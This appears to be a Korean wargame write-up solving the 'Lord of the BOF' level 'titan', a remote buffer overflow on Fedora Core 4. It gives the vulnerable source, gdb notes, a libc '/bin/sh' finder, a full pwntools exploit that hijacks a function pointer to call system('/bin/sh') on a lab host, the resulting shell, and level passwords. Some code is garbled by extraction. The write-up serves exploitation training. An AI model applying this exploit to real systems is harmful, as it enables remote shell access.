반응형
반응형
반응형

ID | enigma

PW | let me ride




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
/*
        The Lord of the BOF : The Fellowship of the BOF
        - titan
        - Remote BOF on Fedora Core 4
        - hint : ? 
    - port : TCP 8888
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
 
static char buffer[40];
static void (*ftn)();
 
void print()
{
        printf("nothing here\n");
    fflush(stdout);
}
 
int main()
{
        char buf[48];
        ftn = print;
 
        printf("titan : What a tragic mistake.\n");
        printf("you : ");
        fflush(stdout);
 
    // give me a food
        fgets(buf,48,stdin);
 
    // buffer overflow!!
        strcpy(buffer,buf);
 
    // preventing RTL
        if(((int)ftn & 0xff000000== 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }
 
    // clearing buffer
    memset(buffer, 040);
 
        ftn();
}
 
cs



fgets로 null 포함 48바이트를 입력받아 strcpy로 buffer[40]에 덮는데, 이 때 ftn도 덮을 수 있어서 ftn을 조작할 수 있다.



esp를 증가시켜서 fgets의 ret주소를 조작해야한다.


(gdb) b *main+108

Breakpoint 1 at 0x8048561

(gdb) r

Starting program: /home/enigma/titan 

Reading symbols from shared object read from target memory...(no debugging symbols found)...done.

Loaded system supplied DSO at 0x612000

(no debugging symbols found)

(no debugging symbols found)

titan : What a tragic mistake.

you : AAAA


Breakpoint 1, 0x08048561 in main ()

(gdb) i r eax

eax            0xbf991764 -1080486044

(gdb) i r esp

esp            0xbf991740 0xbf991740

(gdb) p 0x64-0x40

$1 = 36


buf와 esp차이는 36바이트


fgets의 ret은 buf-40


0x0804854a <main+85>: add    esp,0x10

0x0804854d <main+88>: mov    eax,ds:0x80497e4

0x08048552 <main+93>: sub    esp,0x4

0x08048555 <main+96>: push   eax

0x08048556 <main+97>: push   0x30

0x08048558 <main+99>: lea    eax,[ebp-52]

0x0804855b <main+102>: push   eax

0x0804855c <main+103>: call   0x80483c8


fgets를 call하기전, esp는 최종적으로 0xc만큼 증가한다.


fnt를 *main+85로 덮으면 esp를 12바이트씩 증가할 수 있으니


buf-40 -> -28 > -16 -> -4 -> buf+8



esp를 4번 증가시켜주고, 다음 페이로드에 dummy[8] + system[4] + dummy[4] + binsh[4] 를 담아 보내면 된다.



(gdb) p system
$2 = {<text variable, no debug info>} 0x7db0e7 <system>


"/bin/sh\x00" 찾기

1
2
3
4
5
6
7
8
9
10
#include "stdio.h"
#include "string.h"
 
int main(void){
 
        long shell = 0x7db0e7;  // <=== system()함수의 주소
        while(memcmp((void*)shell,"/bin/sh\x00",8)) shell++;
        printf("\"bin/sh\" is at 0x%lx\n", shell);
}
 
cs


[enigma@Fedora_2ndFloor ~]$ vi find.c

[enigma@Fedora_2ndFloor ~]$ gcc -o find find.c 

[enigma@Fedora_2ndFloor ~]$ ./find 

"bin/sh" is at 0x8bd987


ex.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
 
= remote("192.168.0.205"8888)
 
system = 0x7db0e7
binsh = 0x8bd987
 
payload = ('A' * 40 + p32(0x804854a+"\n"* 4
payload += "A" * 8
 
payload += p32(system)
payload += "AAAA"
payload += p32(binsh)
 
print(p.recvuntil("u :"))
print(payload)
p.send(payload)
 
p.interactive()
 
cs


mandu@mandu-VirtualBox:~/ex_pwn$ python ex.py 

[+] Opening connection to 192.168.0.205 on port 8888: Done

titan : What a tragic mistake.

you :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ\x85\x0

AAAAAAAA��}\x00AAAA\x87ً\x00

[*] Switching to interactive mode

 $ 

$ my-pass

euid = 503

out of the night


반응형

+ Recent posts